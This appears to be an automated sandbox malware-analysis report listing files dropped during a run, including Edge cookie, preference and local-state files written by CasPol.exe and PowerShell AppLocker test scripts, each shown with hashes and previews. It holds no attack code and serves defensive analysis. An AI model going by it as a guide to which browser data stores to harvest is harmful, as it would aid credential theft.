                                                                                                                                                                                                                              Preview:...@..@...@.....C.].....@................h...W..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".npukoh20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............!......................w..U..G...W6.....>.........."....."...24.."."h5wmA/c+VK/+HCTGwU1TrwNY52XBTo9O05htSkjnNRA="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...V.-../Q@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2...............

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\TmpUserData\Crashpad\throttle_store.dat

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):20
                                                                                                                                                                                                                              Entropy (8bit):3.6219280948873624
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:8g6Vvn:8g6Vv
                                                                                                                                                                                                                              MD5:9E4E94633B73F4A7680240A0FFD6CD2C
                                                                                                                                                                                                                              SHA1:E68E02453CE22736169A56FDB59043D33668368F
                                                                                                                                                                                                                              SHA-256:41C91A9C93D76295746A149DCE7EBB3B9EE2CB551D84365FFF108E59A61CC304
                                                                                                                                                                                                                              SHA-512:193011A756B2368956C71A9A3AE8BC9537D99F52218F124B2E64545EEB5227861D372639052B74D0DD956CB33CA72A9107E069F1EF332B9645044849D14AF337
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:level=none expiry=0.

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Network\Cookies

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                              Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):30076
                                                                                                                                                                                                                              Entropy (8bit):5.567681757348418
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:dW10i79LoL6yTWPF9fEm8F1+UoAYDCx9Tuqh0VfUC9xbog/OV4YNL+zurwA7i:dW10i7pW6yTWPF9fEmu1ja1YNizrai
                                                                                                                                                                                                                              MD5:9461EBAAABBC9255D78F7C23D7B52C15
                                                                                                                                                                                                                              SHA1:9A00BB6B50D6D31475EE1A97843F6ED4995498C6
                                                                                                                                                                                                                              SHA-256:FC286DBDDEDAC892061503056D253E108E417CAC356FC64C3B9B18FBE09ECB9B
                                                                                                                                                                                                                              SHA-512:5CC2C915C8C8D228A8AA6FBADEFF5361CA2D966611EA618E02B102CA14C8ADA4DFCF3D5BC324C5185EDAC913D99070E16DC0B3138F8BDCE92C06DBBBB9ED8FF7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13340967441480327","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13340967441480327","location":5,"ma

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\TmpUserData\Last Version

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                                                                              Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                              MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                              SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                              SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                              SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:117.0.2045.47

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\TmpUserData\Local State

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):44170
                                                                                                                                                                                                                              Entropy (8bit):6.090498129723178
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kOCLmZGftR96hOxq4gFkFDlwWE7RTupzKscDX//NPC3:z/Ps+wsI7ynJtGhOxqQoRTuiVIou
                                                                                                                                                                                                                              MD5:9BB971F02CE58B8C3E4CC9FBD015694D
                                                                                                                                                                                                                              SHA1:C800960A86EC73849D19B2CE848096F90A273471
                                                                                                                                                                                                                              SHA-256:DFD1C6BFDA1689CC35D1F411CAABCC8358968C4458A0FE1D387B08DDCBB3C16B
                                                                                                                                                                                                                              SHA-512:29A495881F27FC1891AA1F2B0670DE8176E1336D6BBB827A7B9C21932722ECEAA04A074A0D5D77CF8736ED22497578B9D169530657AF2CEE648392D3648B0281
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\TmpUserData\Local State~RF361c8.TMP (copy)

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):44170
                                                                                                                                                                                                                              Entropy (8bit):6.090498129723178
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kOCLmZGftR96hOxq4gFkFDlwWE7RTupzKscDX//NPC3:z/Ps+wsI7ynJtGhOxqQoRTuiVIou
                                                                                                                                                                                                                              MD5:9BB971F02CE58B8C3E4CC9FBD015694D
                                                                                                                                                                                                                              SHA1:C800960A86EC73849D19B2CE848096F90A273471
                                                                                                                                                                                                                              SHA-256:DFD1C6BFDA1689CC35D1F411CAABCC8358968C4458A0FE1D387B08DDCBB3C16B
                                                                                                                                                                                                                              SHA-512:29A495881F27FC1891AA1F2B0670DE8176E1336D6BBB827A7B9C21932722ECEAA04A074A0D5D77CF8736ED22497578B9D169530657AF2CEE648392D3648B0281
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\TmpUserData\Local State~RF36274.TMP (copy)

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):44170
                                                                                                                                                                                                                              Entropy (8bit):6.090498129723178
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kOCLmZGftR96hOxq4gFkFDlwWE7RTupzKscDX//NPC3:z/Ps+wsI7ynJtGhOxqQoRTuiVIou
                                                                                                                                                                                                                              MD5:9BB971F02CE58B8C3E4CC9FBD015694D
                                                                                                                                                                                                                              SHA1:C800960A86EC73849D19B2CE848096F90A273471
                                                                                                                                                                                                                              SHA-256:DFD1C6BFDA1689CC35D1F411CAABCC8358968C4458A0FE1D387B08DDCBB3C16B
                                                                                                                                                                                                                              SHA-512:29A495881F27FC1891AA1F2B0670DE8176E1336D6BBB827A7B9C21932722ECEAA04A074A0D5D77CF8736ED22497578B9D169530657AF2CEE648392D3648B0281
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\TmpUserData\ShaderCache\data_0

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                                              Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                              MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                              SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                              SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                              SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\TmpUserData\ShaderCache\data_1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                              Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                              MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                              SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                              SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                              SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\TmpUserData\ShaderCache\data_2

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                                              Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                              MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                              SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                              SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                              SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\TmpUserData\ShaderCache\data_3

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                                              Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                              MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                              SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                              SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                              SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\TmpUserData\c0b6d16d-2df0-4081-bce8-916273264adf.tmp

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):41746
                                                                                                                                                                                                                              Entropy (8bit):6.091485863975892
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kv5LmZF+0bW6ADvRcwWE7RTupzKscDX//NPC1ou:z/Ps+wsI7ynrAoRTuiVIou
                                                                                                                                                                                                                              MD5:82EA2991D82F36373A35C80DE983D7FB
                                                                                                                                                                                                                              SHA1:5B84C002D2AD5AA495D9249E07E311F7B22C92E7
                                                                                                                                                                                                                              SHA-256:C6A75F68ACAAD5A98E241919020CB1E6D1B1A44B342026A7BDA0706D0D934ADB
                                                                                                                                                                                                                              SHA-512:5BF4AD1B0139C3362E0AFB45A8CAF5A4FA47FBBB6B143D9FC8FD3178FAACC19A5167E65743C69D5530C8706F4B101440BE8E537249B9A8C1863807A58BF84513
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\TmpUserData\e80bdf99-9f5e-4092-81d1-a436d601c17e.tmp

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                              Size (bytes):41746
                                                                                                                                                                                                                              Entropy (8bit):6.091485863975892
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kv5LmZF+0bW6ADvRcwWE7RTupzKscDX//NPC1ou:z/Ps+wsI7ynrAoRTuiVIou
                                                                                                                                                                                                                              MD5:82EA2991D82F36373A35C80DE983D7FB
                                                                                                                                                                                                                              SHA1:5B84C002D2AD5AA495D9249E07E311F7B22C92E7
                                                                                                                                                                                                                              SHA-256:C6A75F68ACAAD5A98E241919020CB1E6D1B1A44B342026A7BDA0706D0D934ADB
                                                                                                                                                                                                                              SHA-512:5BF4AD1B0139C3362E0AFB45A8CAF5A4FA47FBBB6B143D9FC8FD3178FAACC19A5167E65743C69D5530C8706F4B101440BE8E537249B9A8C1863807A58BF84513
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2m5odiz0.rax.ps1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f1xpek3d.jrk.ps1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h5lm20tc.cvj.psm1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
